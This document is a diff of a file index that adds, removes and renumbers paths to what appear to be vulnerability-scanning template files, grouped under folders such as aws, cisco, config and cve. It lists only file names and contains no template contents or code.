@@ -4821,12 +4788,10 @@ ./poc/aws/aws-ec2.yaml ./poc/aws/aws-ecs-container-agent-tasks-639.yaml ./poc/aws/aws-ecs-container-agent-tasks-640.yaml -./poc/aws/aws-ecs-container-agent-tasks-641.yaml ./poc/aws/aws-ecs-container-agent-tasks.yaml ./poc/aws/aws-elastic-beanstalk-detect-642.yaml ./poc/aws/aws-elastic-beanstalk-detect-643.yaml ./poc/aws/aws-elastic-beanstalk-detect-644.yaml -./poc/aws/aws-elastic-beanstalk-detect.yaml ./poc/aws/aws-elastic-beanstalk.yaml ./poc/aws/aws-metadata.yaml ./poc/aws/aws-mfa-not-enabled.yaml @@ -4834,9 +4799,10 @@ ./poc/aws/aws-object-listing-646.yaml ./poc/aws/aws-object-listing-647.yaml ./poc/aws/aws-object-listing.yaml -./poc/aws/aws-opensearch-login-650.yaml +./poc/aws/aws-opensearch-login-649.yaml ./poc/aws/aws-opensearch-login.yaml ./poc/aws/aws-rds-cluster.yaml +./poc/aws/aws-redirect-651.yaml ./poc/aws/aws-redirect-652.yaml ./poc/aws/aws-redirect-653.yaml ./poc/aws/aws-redirect-654.yaml @@ -4852,11 +4818,11 @@ ./poc/aws/awstats-config-1.yaml ./poc/aws/awstats-config-2.yaml ./poc/aws/awstats-config-655.yaml -./poc/aws/awstats-config.yaml +./poc/aws/awstats-config-656.yaml ./poc/aws/awstats-script-1.yaml ./poc/aws/awstats-script-2.yaml ./poc/aws/awstats-script-3.yaml -./poc/aws/awstats-script-658.yaml +./poc/aws/awstats-script-657.yaml ./poc/aws/awstats-script.yaml ./poc/aws/ays-facebook-popup-likebox-4d80be371c08993d257d71a67ec23c4b.yaml ./poc/aws/best-woocommerce-feed-b97fc2565dd574eec2be30a866171222.yaml @@ -4909,7 +4875,7 @@ ./poc/aws/easy-social-share-buttons3.yaml ./poc/aws/easy-testimonials-63219e4a52f76a6b0555468e9ceec2c8.yaml ./poc/aws/ec2-detection-7161.yaml -./poc/aws/ec2-detection-7162.yaml +./poc/aws/ec2-detection-7163.yaml ./poc/aws/ec2-imdsv2.yaml ./poc/aws/ec2-instance-information.yaml ./poc/aws/ec2-public-ip.yaml 
@@ -4961,7 +4927,6 @@ ./poc/aws/metadata-aws-8810.yaml ./poc/aws/metadata-aws-8811.yaml ./poc/aws/metadata-aws-8812.yaml -./poc/aws/metadata-aws.yaml ./poc/aws/mime-types-extended-da21a491c0c1b70fec28427963a101bc.yaml ./poc/aws/miniorange-saml-20-single-sign-on-c1ec21b40a223f72a0391ca004186868.yaml ./poc/aws/nd-restaurant-reservations-61b4800084edec2087aa04c88795185e.yaml @@ -5018,7 +4983,7 @@ ./poc/aws/s3-sensitive-api.yaml ./poc/aws/s3-server-side-encryption.yaml ./poc/aws/s3-subtakeover-9967.yaml -./poc/aws/s3-subtakeover-9968.yaml +./poc/aws/s3-subtakeover-9969.yaml ./poc/aws/s3-subtakeover.yaml ./poc/aws/s3-versioning.yaml ./poc/aws/s3-video-1e3ee3e7b398636c16a13429ce61da87.yaml @@ -5252,7 +5217,7 @@ ./poc/backup/database-backups-2c3b52741f120d634a1b6cf5bf4454f6.yaml ./poc/backup/database-backups.yaml ./poc/backup/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml -./poc/backup/db-backup-lfi-6774.yaml +./poc/backup/db-backup-lfi-6775.yaml ./poc/backup/db-backup-lfi-6776.yaml ./poc/backup/db-backup-lfi.yaml ./poc/backup/db-backup.yaml 
@@ -5314,19 +5279,19 @@ ./poc/backup/php-backup-files-7.yaml ./poc/backup/php-backup-files-8.yaml ./poc/backup/php-backup-files-9.yaml -./poc/backup/php-backup-files-9497.yaml +./poc/backup/php-backup-files-9498.yaml ./poc/backup/php-backup-files.yaml ./poc/backup/phpmybackuppro.yaml ./poc/backup/rds-backup-enable.yaml ./poc/backup/recent-backups-aecbf28838f410f4e37aa987e88ec484.yaml ./poc/backup/recent-backups.yaml +./poc/backup/server-backup-login-10153.yaml ./poc/backup/server-backup-login-10154.yaml ./poc/backup/server-backup-login-10155.yaml -./poc/backup/server-backup-login-10156.yaml ./poc/backup/server-backup-login.yaml -./poc/backup/server-backup-manager-se-10157.yaml ./poc/backup/server-backup-manager-se-10158.yaml ./poc/backup/server-backup-manager-se-10159.yaml +./poc/backup/server-backup-manager-se-10160.yaml ./poc/backup/server-backup-manager-se-10161.yaml ./poc/backup/server-backup-manager-se-login-detect.yaml ./poc/backup/server-backup-manager-se.yaml @@ -5350,8 +5315,8 @@ ./poc/backup/wordpress-db-backup-listing-11250.yaml ./poc/backup/wordpress-db-backup-listing.yaml ./poc/backup/wordpress-db-backup.yaml -./poc/backup/wordpress-total-upkeep-backup-download-11322.yaml ./poc/backup/wordpress-total-upkeep-backup-download-11323.yaml +./poc/backup/wordpress-total-upkeep-backup-download-11324.yaml ./poc/backup/wordpress-total-upkeep-backup-download.yaml ./poc/backup/wp-all-backup-1de8fa81dd8966d653962310f7ca2926.yaml ./poc/backup/wp-all-backup.yaml 
@@ -5502,15 +5467,15 @@ ./poc/cisco/cisco-asa-panel.yaml ./poc/cisco/cisco-asa-version.yaml ./poc/cisco/cisco-asa-workflow.yaml -./poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +./poc/cisco/cisco-cloudcenter-suite-rce.yaml ./poc/cisco/cisco-cve-2020-3452-readfile.yml ./poc/cisco/cisco-edge-340-937.yaml ./poc/cisco/cisco-edge-340.yaml ./poc/cisco/cisco-email-security-detect.yaml ./poc/cisco/cisco-expressway-panel.yaml ./poc/cisco/cisco-expressway.yaml -./poc/cisco/cisco-finesse-login-938.yaml ./poc/cisco/cisco-finesse-login-939.yaml +./poc/cisco/cisco-finesse-login-940.yaml ./poc/cisco/cisco-finesse-login.yaml ./poc/cisco/cisco-finger-detect.yaml ./poc/cisco/cisco-imc-supervisor.yaml 
@@ -5521,32 +5486,30 @@ ./poc/cisco/cisco-ios-xe-panel.yaml ./poc/cisco/cisco-iox.yaml ./poc/cisco/cisco-meeting-app.yaml +./poc/cisco/cisco-meraki-exposure-944.yaml ./poc/cisco/cisco-meraki-exposure-945.yaml -./poc/cisco/cisco-meraki-exposure-946.yaml ./poc/cisco/cisco-meraki-exposure.yaml ./poc/cisco/cisco-meraki-workflow.yaml ./poc/cisco/cisco-network-config-947.yaml ./poc/cisco/cisco-network-config-948.yaml -./poc/cisco/cisco-network-config-949.yaml ./poc/cisco/cisco-network-config-950.yaml ./poc/cisco/cisco-network-config-951.yaml +./poc/cisco/cisco-network-config.yaml ./poc/cisco/cisco-nexus-data-broker.yaml ./poc/cisco/cisco-onprem-panel.yaml -./poc/cisco/cisco-prime-infrastructure-952.yaml ./poc/cisco/cisco-prime-infrastructure-953.yaml +./poc/cisco/cisco-prime-infrastructure-954.yaml ./poc/cisco/cisco-prime-infrastructure.yaml ./poc/cisco/cisco-prime-network-registrar.yaml ./poc/cisco/cisco-rv-series-rce.yaml +./poc/cisco/cisco-sd-wan-955.yaml ./poc/cisco/cisco-sd-wan-956.yaml -./poc/cisco/cisco-sd-wan-957.yaml ./poc/cisco/cisco-sd-wan.yaml ./poc/cisco/cisco-secure-cn-959.yaml ./poc/cisco/cisco-secure-cn.yaml ./poc/cisco/cisco-secure-desktop-960.yaml ./poc/cisco/cisco-secure-desktop-961.yaml -./poc/cisco/cisco-secure-desktop-962.yaml ./poc/cisco/cisco-secure-desktop.yaml -./poc/cisco/cisco-security-details-963.yaml ./poc/cisco/cisco-security-details-964.yaml ./poc/cisco/cisco-security-details.yaml ./poc/cisco/cisco-sendgrid-965.yaml 
@@ -5554,19 +5517,19 @@ ./poc/cisco/cisco-sendgrid-968.yaml ./poc/cisco/cisco-sendgrid.yaml ./poc/cisco/cisco-smi-exposure-970.yaml -./poc/cisco/cisco-smi-exposure-972.yaml +./poc/cisco/cisco-smi-exposure-971.yaml ./poc/cisco/cisco-smi-exposure.yaml ./poc/cisco/cisco-ssl-vpn.yaml +./poc/cisco/cisco-systems-login-973.yaml ./poc/cisco/cisco-systems-login-974.yaml -./poc/cisco/cisco-systems-login-975.yaml ./poc/cisco/cisco-systems-login.yaml +./poc/cisco/cisco-telepresence-976.yaml ./poc/cisco/cisco-telepresence-977.yaml -./poc/cisco/cisco-telepresence-978.yaml ./poc/cisco/cisco-telepresence.yaml ./poc/cisco/cisco-ucm.yaml ./poc/cisco/cisco-ucs-director-panel-detect.yaml ./poc/cisco/cisco-ucs-director.yaml -./poc/cisco/cisco-ucs-kvm-login-980.yaml +./poc/cisco/cisco-ucs-kvm-login-979.yaml ./poc/cisco/cisco-ucs-kvm-login.yaml ./poc/cisco/cisco-unity-express-panel-detect.yaml ./poc/cisco/cisco-unity-panel.yaml @@ -5583,7 +5546,6 @@ ./poc/coldfusion/adobe-coldfusion-detect-4.yaml ./poc/coldfusion/adobe-coldfusion-detect-5.yaml ./poc/coldfusion/adobe-coldfusion-detect-6.yaml -./poc/coldfusion/adobe-coldfusion-detect-82.yaml ./poc/coldfusion/adobe-coldfusion-detect-83.yaml ./poc/coldfusion/adobe-coldfusion-detect-84.yaml ./poc/coldfusion/adobe-coldfusion-detector-1.yaml @@ -5594,8 +5556,9 @@ ./poc/coldfusion/adobe-coldfusion-detector-6.yaml ./poc/coldfusion/adobe-coldfusion-detector-error.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-85.yaml +./poc/coldfusion/adobe-coldfusion-error-detect-86.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-87.yaml -./poc/coldfusion/adobe-coldfusion-error-detect-88.yaml +./poc/coldfusion/adobe-coldfusion-error-detect.yaml ./poc/coldfusion/better-messages-wcfm-integration-6477bf18cad6c823db485408d49b337b.yaml ./poc/coldfusion/better-messages-wcfm-integration-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/coldfusion/better-messages-wcfm-integration.yaml 
@@ -5611,9 +5574,9 @@ ./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-debug-xss-1.yaml ./poc/coldfusion/coldfusion-debug-xss-1152.yaml +./poc/coldfusion/coldfusion-debug-xss-1153.yaml ./poc/coldfusion/coldfusion-debug-xss-1154.yaml ./poc/coldfusion/coldfusion-debug-xss-2.yaml -./poc/coldfusion/coldfusion-debug-xss.yaml ./poc/coldfusion/coldfusion-files.yaml ./poc/coldfusion/coldfusion-lucee-auth-bypass.yaml ./poc/coldfusion/coldfusion-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -5624,6 +5587,7 @@ ./poc/coldfusion/tenda-w15e-routercfm-cfg-config-leak.yaml ./poc/coldfusion/unpatched-coldfusion-10977.yaml ./poc/coldfusion/unpatched-coldfusion-10978.yaml +./poc/coldfusion/unpatched-coldfusion-10979.yaml ./poc/coldfusion/unpatched-coldfusion.yaml ./poc/coldfusion/wcfm-marketplace-rest-api-83211a697400a39f3ef0aefc82922e72.yaml ./poc/coldfusion/wcfm-marketplace-rest-api.yaml @@ -5649,17 +5613,16 @@ ./poc/config/account-confirmation-link-manipulation.yaml ./poc/config/aem_misconfig.yaml ./poc/config/aerohive-netconfig-ui-199.yaml +./poc/config/aerohive-netconfig-ui-200.yaml ./poc/config/aerohive-netconfig-ui-201.yaml -./poc/config/aerohive-netconfig-ui.yaml ./poc/config/airflow-configuration-exposure-229.yaml -./poc/config/airflow-configuration-exposure.yaml +./poc/config/airflow-configuration-exposure-230.yaml ./poc/config/alibaba-canal-config-leak.yaml ./poc/config/amazon-docker-config-279.yaml -./poc/config/amazon-docker-config-280.yaml -./poc/config/amazon-docker-config-disclosure-278.yaml ./poc/config/amazon-docker-config-disclosure.yaml +./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml -./poc/config/ansible-config-disclosure.yaml +./poc/config/ansible-config-disclosure-326.yaml ./poc/config/apache-config-343.yaml ./poc/config/apache-config-344.yaml ./poc/config/apache-config-exposure.yaml 
@@ -5667,26 +5630,31 @@ ./poc/config/apache-httpd-conf-disclosure.yaml ./poc/config/apache-httpd-conf-exposure.yml ./poc/config/api-iconfinder-438.yaml +./poc/config/api-iconfinder-439.yaml ./poc/config/aws-config-not-enabled.yaml ./poc/config/aws-s3-misconfig.yaml ./poc/config/awstats-config-1.yaml ./poc/config/awstats-config-2.yaml ./poc/config/awstats-config-655.yaml -./poc/config/awstats-config.yaml +./poc/config/awstats-config-656.yaml ./poc/config/azure-pipelines-config-disclosure.yaml ./poc/config/basic-cors-misconfig.yaml ./poc/config/bigip-config-utility-detect-1.yaml ./poc/config/bigip-config-utility-detect-2.yaml ./poc/config/bigip-config-utility-detect-3.yaml +./poc/config/bigip-config-utility-detect-730.yaml ./poc/config/bigip-config-utility-detect-731.yaml +./poc/config/bigip-config-utility-detect-732.yaml ./poc/config/bigip-config-utility-detect.yaml -./poc/config/buffalo-config-injection-798.yaml ./poc/config/buffalo-config-injection-799.yaml +./poc/config/buffalo-config-injection-800.yaml +./poc/config/buffalo-config-injection-801.yaml ./poc/config/buffalo-config-injection.yaml ./poc/config/cache-control-header-misconfiguration.yaml ./poc/config/child-theme-configurator.yaml ./poc/config/chinatelecomequipmentwebconfigurationsystem.yaml ./poc/config/circleci-config-922.yaml +./poc/config/circleci-config-923.yaml ./poc/config/circleci-config-925.yaml ./poc/config/circleci-config.yaml ./poc/config/circleci-ssh-config-926.yaml @@ -5695,9 +5663,9 @@ ./poc/config/circleci-ssh-config.yaml ./poc/config/cisco-network-config-947.yaml ./poc/config/cisco-network-config-948.yaml -./poc/config/cisco-network-config-949.yaml ./poc/config/cisco-network-config-950.yaml ./poc/config/cisco-network-config-951.yaml +./poc/config/cisco-network-config.yaml ./poc/config/cloud-config.yaml ./poc/config/cloud-storage-misconfig.yaml ./poc/config/coep-misconfig.yaml 
@@ -5713,7 +5681,8 @@ ./poc/config/config-js.yaml ./poc/config/config-parameters-yml.yaml ./poc/config/config-properties.yaml -./poc/config/config-rb-1180.yaml +./poc/config/config-rb-1179.yaml +./poc/config/config-rb.yaml ./poc/config/config.php.new.yaml ./poc/config/config.yaml ./poc/config/config.yml @@ -5743,15 +5712,15 @@ ./poc/config/confluence-dashboard.yaml ./poc/config/confluence-detect-1.yaml ./poc/config/confluence-detect-1186.yaml -./poc/config/confluence-detect-1187.yaml ./poc/config/confluence-detect-1188.yaml +./poc/config/confluence-detect-1189.yaml ./poc/config/confluence-detect-2.yaml ./poc/config/confluence-detect-3.yaml ./poc/config/confluence-detect-4.yaml ./poc/config/confluence-detect.yaml ./poc/config/confluence-ssrf-sharelinks-1190.yaml ./poc/config/confluence-ssrf-sharelinks-1191.yaml -./poc/config/confluence-ssrf-sharelinks-1193.yaml +./poc/config/confluence-ssrf-sharelinks-1192.yaml ./poc/config/confluence-ssrf-sharelinks-1194.yaml ./poc/config/confluence-workflow-1195.yaml ./poc/config/confluence-workflow.yaml @@ -5765,6 +5734,7 @@ ./poc/config/coremail-config-disclosure-1216.yaml ./poc/config/coremail-config-disclosure.yaml ./poc/config/cors-misconfig-1222.yaml +./poc/config/cors-misconfig-1223.yaml ./poc/config/cors-misconfig-1224.yaml ./poc/config/debug-log-config-tool-de2ab3ada51607e8bc54fae30ad1a036.yaml ./poc/config/debug-log-config-tool.yaml 
@@ -5785,13 +5755,12 @@ ./poc/config/docker-compose-config-7.yaml ./poc/config/docker-compose-config-7057.yaml ./poc/config/docker-compose-config-7058.yaml -./poc/config/docker-compose-config-7059.yaml +./poc/config/docker-compose-config.yaml ./poc/config/docker-compose-config.yml ./poc/config/docker-misconfigured-api.yaml ./poc/config/dockercfg-config-1.yaml ./poc/config/dockercfg-config-2.yaml ./poc/config/dockercfg-config-7056.yaml -./poc/config/dockercfg-config.yaml ./poc/config/dockerrun-aws-config-page.yaml ./poc/config/dompdf-config.yaml ./poc/config/drupal_module-config_pages-information-disclosure.yaml @@ -5825,7 +5794,6 @@ ./poc/config/firebase-config-exposure-7485.yaml ./poc/config/firebase-config-exposure-7486.yaml ./poc/config/firebase-config-exposure-7488.yaml -./poc/config/firebase-config-exposure.yaml ./poc/config/firebase-config-file.yaml ./poc/config/firebase-config.yaml ./poc/config/fps-config.yaml @@ -5833,13 +5801,15 @@ ./poc/config/front-page-misconfig-2.yaml ./poc/config/front-page-misconfig-7545.yaml ./poc/config/front-page-misconfig-7546.yaml +./poc/config/front-page-misconfig-7547.yaml ./poc/config/front-page-misconfig-7550.yaml ./poc/config/front-page-misconfig.yaml +./poc/config/ftpconfig-7565.yaml ./poc/config/ftpconfig-7566.yaml -./poc/config/ftpconfig.yaml ./poc/config/gcs-misconfig.yaml ./poc/config/git-config-7633.yaml ./poc/config/git-config-7634.yaml +./poc/config/git-config-7635.yaml ./poc/config/git-config-7636.yaml ./poc/config/git-config-7637.yaml ./poc/config/git-config-7638.yaml 
@@ -5852,20 +5822,21 @@ ./poc/config/git-config-nginxoffbyslash-5.yaml ./poc/config/git-config-nginxoffbyslash-6.yaml ./poc/config/git-config-nginxoffbyslash-7.yaml +./poc/config/git-config-nginxoffbyslash-7628.yaml ./poc/config/git-config-nginxoffbyslash-7629.yaml +./poc/config/git-config-nginxoffbyslash-7630.yaml ./poc/config/git-config-nginxoffbyslash-7631.yaml -./poc/config/git-config-nginxoffbyslash-7632.yaml ./poc/config/git-config-nginxoffbyslash-8.yaml ./poc/config/git-config-nginxoffbyslash-9.yaml ./poc/config/git-config-nginxoffbyslash.yaml ./poc/config/git-config.yaml +./poc/config/github-page-config-7654.yaml ./poc/config/github-page-config-7655.yaml ./poc/config/github-page-config-7656.yaml ./poc/config/gitlab-config-exposure.yml ./poc/config/glpi-fusioninventory-misconfig.yaml ./poc/config/gocd-cruise-configuration-7746.yaml ./poc/config/gocd-cruise-configuration-7747.yaml -./poc/config/gocd-cruise-configuration-7748.yaml ./poc/config/gocd-cruise-configuration.yaml ./poc/config/grafana-exposed-configuration.yaml ./poc/config/grandstream-device-configuration.yaml @@ -5877,13 +5848,13 @@ ./poc/config/heuristic-scanning-not-configured.yaml ./poc/config/hikvision-camera-bypass-configuration-file-download.yaml ./poc/config/honeywell-scada-config-7989.yaml +./poc/config/honeywell-scada-config-7990.yaml ./poc/config/honeywell-scada-config-7991.yaml -./poc/config/honeywell-scada-config-7992.yaml -./poc/config/honeywell-scada-config.yaml ./poc/config/htaccess-config-8042.yaml +./poc/config/htaccess-config-8043.yaml ./poc/config/htaccess-config.yaml ./poc/config/httpd-config-8054.yaml -./poc/config/httpd-config.yaml +./poc/config/httpd-config-8055.yaml ./poc/config/huace-Config-infoLeak.yaml ./poc/config/huace-mews-config-xml-infoleak.yaml ./poc/config/huiwen-book-config-properties-info-leak.yaml 
@@ -5900,9 +5871,9 @@ ./poc/config/kafka-misconfig.yaml ./poc/config/keycloak-openid-config-1.yaml ./poc/config/keycloak-openid-config-2.yaml -./poc/config/keycloak-openid-config-8475.yaml ./poc/config/keycloak-openid-config-8476.yaml ./poc/config/keycloak-openid-config-8477.yaml +./poc/config/keycloak-openid-config.yaml ./poc/config/login-configurator-14616c5034dd1ddef5b9442340e35c8b.yaml ./poc/config/login-configurator-aeebbaa9f5df299f369d13242d94e3a5.yaml ./poc/config/login-configurator-fe19785cecc9ded62fb9e19ffd55d7fb.yaml @@ -5913,16 +5884,16 @@ ./poc/config/magento-config-8700.yaml ./poc/config/magento-config-8701.yaml ./poc/config/magento-config-8703.yaml -./poc/config/magento-config-disclosure.yaml ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/misconfig.yaml ./poc/config/misconfigured-concrete5.yaml +./poc/config/misconfigured-docker-8900.yaml ./poc/config/misconfigured-docker-8901.yaml -./poc/config/misconfigured-docker-8902.yaml ./poc/config/misconfigured-docker.yaml ./poc/config/misconfigured-redis.yaml ./poc/config/msmtp-config-8966.yaml +./poc/config/msmtp-config-8967.yaml ./poc/config/nconf-panel.yaml ./poc/config/nexus-repo-config-exposure.yml ./poc/config/nexus-repository-exposed-configuration.yaml @@ -5930,8 +5901,8 @@ ./poc/config/nginx-config-9096.yaml ./poc/config/nginx-config-9097.yaml ./poc/config/nginx-config-9098.yaml +./poc/config/nginx-config-9099.yaml ./poc/config/nginx-config-exposure.yaml -./poc/config/nginx-config.yaml ./poc/config/nginx_Misconfiguration.yaml ./poc/config/nuclei_esConfig.yaml ./poc/config/om-video-conferencing.yaml @@ -5942,7 +5913,7 @@ ./poc/config/oracle-ebs-config-disclosure.yaml ./poc/config/owncloud-config-9419.yaml ./poc/config/owncloud-config.yaml -./poc/config/parameters-config-9465.yaml +./poc/config/parameters-config.yaml ./poc/config/phinx-config.yaml ./poc/config/php-fpm-config-9513.yaml ./poc/config/php-fpm-config-9514.yaml 
@@ -5951,10 +5922,10 @@ ./poc/config/prod-conf.yaml ./poc/config/proftpd-config-9666.yaml ./poc/config/proftpd-config.yaml +./poc/config/prometheus-config-9673.yaml ./poc/config/prometheus-config-endpoint-9671.yaml ./poc/config/prometheus-config-endpoint-9672.yaml ./poc/config/prometheus-config-endpoint.yaml -./poc/config/prometheus-config.yaml ./poc/config/publish-confirm-message-be37091b7b8e5fc7583cd9ff3bba3042.yaml ./poc/config/publish-confirm-message.yaml ./poc/config/rabbitmq-config-exposure.yml @@ -5979,7 +5950,7 @@ ./poc/config/saltstack-config-panel.yaml ./poc/config/samba-config-9985.yaml ./poc/config/samba-config-9986.yaml -./poc/config/samba-config-9987.yaml +./poc/config/samba-config.yaml ./poc/config/seeyon-a6-config-disclosure.yaml ./poc/config/server-config-exposure.yaml ./poc/config/sftp-config-exposure.yaml @@ -5990,8 +5961,8 @@ ./poc/config/springboot-autoconfig-1.yaml ./poc/config/springboot-autoconfig-10437.yaml ./poc/config/springboot-autoconfig-2.yaml -./poc/config/springboot-autoconfig.yaml ./poc/config/springboot-configprops-1.yaml +./poc/config/springboot-configprops-10442.yaml ./poc/config/springboot-configprops-10443.yaml ./poc/config/springboot-configprops-10444.yaml ./poc/config/springboot-configprops-10445.yaml 
@@ -6004,23 +5975,22 @@ ./poc/config/svnserve-config.yaml ./poc/config/symfony-database-config-10614.yaml ./poc/config/symfony-database-config-10615.yaml -./poc/config/symfony-database-config-10616.yaml -./poc/config/symfony-database-config.yaml +./poc/config/symfony-database-config-10617.yaml ./poc/config/symfony-security-config-1.yaml ./poc/config/symfony-security-config-2.yaml ./poc/config/tasmota-config-webui.yaml ./poc/config/tcpconfig-10664.yaml ./poc/config/tcpconfig-10665.yaml ./poc/config/tcpconfig-10666.yaml +./poc/config/tcpconfig.yaml ./poc/config/techbridge-cloud-conference.yaml ./poc/config/tenda-w15e-routercfm-cfg-config-leak.yaml ./poc/config/the-conference-22b4ad0345c7f065a84ce9174ab4fe7e.yaml ./poc/config/the-conference.yaml ./poc/config/truffle-config-exposure.yaml ./poc/config/tugboat-config-exposure-10841.yaml -./poc/config/tugboat-config-exposure-10842.yaml +./poc/config/tugboat-config-exposure-10843.yaml ./poc/config/tugboat-config-exposure-10844.yaml -./poc/config/tugboat-config-exposure.yaml ./poc/config/unconfirmed-abc400f143f0254b15b00169f8369d29.yaml ./poc/config/unconfirmed.yaml ./poc/config/v2-video-conferencing.yaml @@ -6051,14 +6021,12 @@ ./poc/config/videowhisper-video-conference-integration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/config/videowhisper-video-conference-integration-plugin.yaml ./poc/config/videowhisper-video-conference-integration.yaml -./poc/config/wamp-server-configuration-11096.yaml ./poc/config/wamp-server-configuration-11097.yaml ./poc/config/wamp-server-configuration-11098.yaml ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml ./poc/config/web-config-11123.yaml ./poc/config/web-config-11124.yaml -./poc/config/web-config-11125.yaml ./poc/config/web-config-11126.yaml ./poc/config/web-config-11127.yaml ./poc/config/web-config.yaml 
@@ -6081,7 +6049,6 @@ ./poc/config/wordpress-accessible-wpconfig-10.yaml ./poc/config/wordpress-accessible-wpconfig-11.yaml ./poc/config/wordpress-accessible-wpconfig-11234.yaml -./poc/config/wordpress-accessible-wpconfig-11235.yaml ./poc/config/wordpress-accessible-wpconfig-11237.yaml ./poc/config/wordpress-accessible-wpconfig-11238.yaml ./poc/config/wordpress-accessible-wpconfig-11239.yaml @@ -6104,7 +6071,6 @@ ./poc/config/wordpress-accessible-wpconfig.yaml ./poc/config/wordpress-config-disclosure.yaml ./poc/config/wordpress-git-config-1.yaml -./poc/config/wordpress-git-config-11278.yaml ./poc/config/wordpress-git-config-11279.yaml ./poc/config/wordpress-git-config-2.yaml ./poc/config/wordpress-misconfig.yaml @@ -6130,12 +6096,11 @@ ./poc/config/wpconfig-aws-keys-2.yaml ./poc/config/wpconfig-aws-keys.yaml ./poc/config/wpconfig.yaml -./poc/config/wpengine-config-check.yaml ./poc/config/wpeprivate-config-disclosure.yaml ./poc/config/ws-config.yaml ./poc/config/yunbox-baolei-config-fastjson-rce.yaml ./poc/config/zend-config-file-11777.yaml -./poc/config/zend-config-file-11779.yaml +./poc/config/zend-config-file-11778.yaml ./poc/config/zend-config-file.yaml ./poc/config/zimbra-config-exposure.yml ./poc/cpanel/OFJAAAH-cpanelXSS.yaml @@ -6148,6 +6113,7 @@ ./poc/crlf_injection/crlf-injection-1.yaml ./poc/crlf_injection/crlf-injection-1260.yaml ./poc/crlf_injection/crlf-injection-1261.yaml +./poc/crlf_injection/crlf-injection-1262.yaml ./poc/crlf_injection/crlf-injection-1263.yaml ./poc/crlf_injection/crlf-injection-1264.yaml ./poc/crlf_injection/crlf-injection-1265.yaml 
@@ -6176,8 +6142,8 @@ ./poc/cross_site_request_forgery/csrf-token-missing.yaml ./poc/cross_site_request_forgery/csrf.yaml ./poc/cross_site_request_forgery/csrf2.yaml -./poc/cross_site_request_forgery/csrfguard-detect-1290.yaml ./poc/cross_site_request_forgery/csrfguard-detect-1291.yaml +./poc/cross_site_request_forgery/csrfguard-detect.yaml ./poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml ./poc/cross_site_request_forgery/drupal_module-cloud-csrf.yaml ./poc/cross_site_request_forgery/hidden-csrf-token.yaml @@ -6266,6 +6232,7 @@ ./poc/cve/CNVD-2021-15822.yaml ./poc/cve/CNVD-2021-15824.yaml ./poc/cve/CNVD-2021-17369.yaml +./poc/cve/CNVD-2021-26422.yaml ./poc/cve/CNVD-2021-30167-1.yaml ./poc/cve/CNVD-2021-30167-2.yaml ./poc/cve/CNVD-2021-30167.yaml @@ -12485,6 +12452,7 @@ ./poc/cve/CVE-2019-8943.yaml ./poc/cve/CVE-2019-8982.yaml ./poc/cve/CVE-2019-9041.yaml +./poc/cve/CVE-2019-9082 (copy 2).yaml ./poc/cve/CVE-2019-9082.yaml ./poc/cve/CVE-2019-9168-8538d93dc59d2dac55aa865d48cc9611.yaml ./poc/cve/CVE-2019-9168.yaml @@ -12540,7 +12508,6 @@ ./poc/cve/CVE-2019-9978.yaml ./poc/cve/CVE-2020-0618.yaml ./poc/cve/CVE-2020-0646.yaml -./poc/cve/CVE-2020-10124 (copy 1).yaml ./poc/cve/CVE-2020-10124.yaml ./poc/cve/CVE-2020-10148 (copy 2).yaml ./poc/cve/CVE-2020-10148.yaml @@ -17337,6 +17304,7 @@ ./poc/cve/CVE-2022-0919.yaml ./poc/cve/CVE-2022-0920-a3427aad6ed07b9d0cef564d7db0125c.yaml ./poc/cve/CVE-2022-0920.yaml +./poc/cve/CVE-2022-0921.yaml ./poc/cve/CVE-2022-0928.yaml ./poc/cve/CVE-2022-0948-99020965bb89f1929411392421aa5e11.yaml ./poc/cve/CVE-2022-0948.yaml @@ -25565,6 +25533,7 @@ ./poc/cve/CVE-2023-34032.yaml ./poc/cve/CVE-2023-34033-1ebbafba0851b62098503319589fcf92.yaml ./poc/cve/CVE-2023-34033.yaml +./poc/cve/CVE-2023-34039.yaml ./poc/cve/CVE-2023-3404-b422833eade5f8c090e65b44154f3e9e.yaml ./poc/cve/CVE-2023-3404.yaml ./poc/cve/CVE-2023-3407-46533b3cbb6a8d63a3a806bab7acc70b.yaml 
@@ -31385,6 +31354,7 @@ ./poc/cve/CVE-2024-1178.yaml ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml ./poc/cve/CVE-2024-1181.yaml +./poc/cve/CVE-2024-1183.yaml ./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml ./poc/cve/CVE-2024-1203.yaml ./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml @@ -34946,6 +34916,7 @@ ./poc/cve/CVE-2024-32640.yaml ./poc/cve/CVE-2024-3265-f7037b4d5ba1f01f180fdea2f2f81d6e.yaml ./poc/cve/CVE-2024-3265.yaml +./poc/cve/CVE-2024-32651.yaml ./poc/cve/CVE-2024-3266-2b13ea444681b03f5c12cb9a9613ae86.yaml ./poc/cve/CVE-2024-3266.yaml ./poc/cve/CVE-2024-3267-84dd6ac30e76a438ef520f1f7b3b7c6e.yaml @@ -36000,6 +35971,7 @@ ./poc/cve/CVE-2024-3565-4c380b36845ecda09785bb681a06a59e.yaml ./poc/cve/CVE-2024-3565.yaml ./poc/cve/CVE-2024-35668-ae50ce1b29ca73379d7c86a29c71520b.yaml +./poc/cve/CVE-2024-35668.yaml ./poc/cve/CVE-2024-35672-486db9c86df3e8118b4d673efcb7bc70.yaml ./poc/cve/CVE-2024-35672.yaml ./poc/cve/CVE-2024-35673-e1796442c9c94fea31305d80d3cc86c1.yaml @@ -36096,6 +36068,7 @@ ./poc/cve/CVE-2024-3667-f6d21d0de8da3dd348f9b7d2ad61f464.yaml ./poc/cve/CVE-2024-3667.yaml 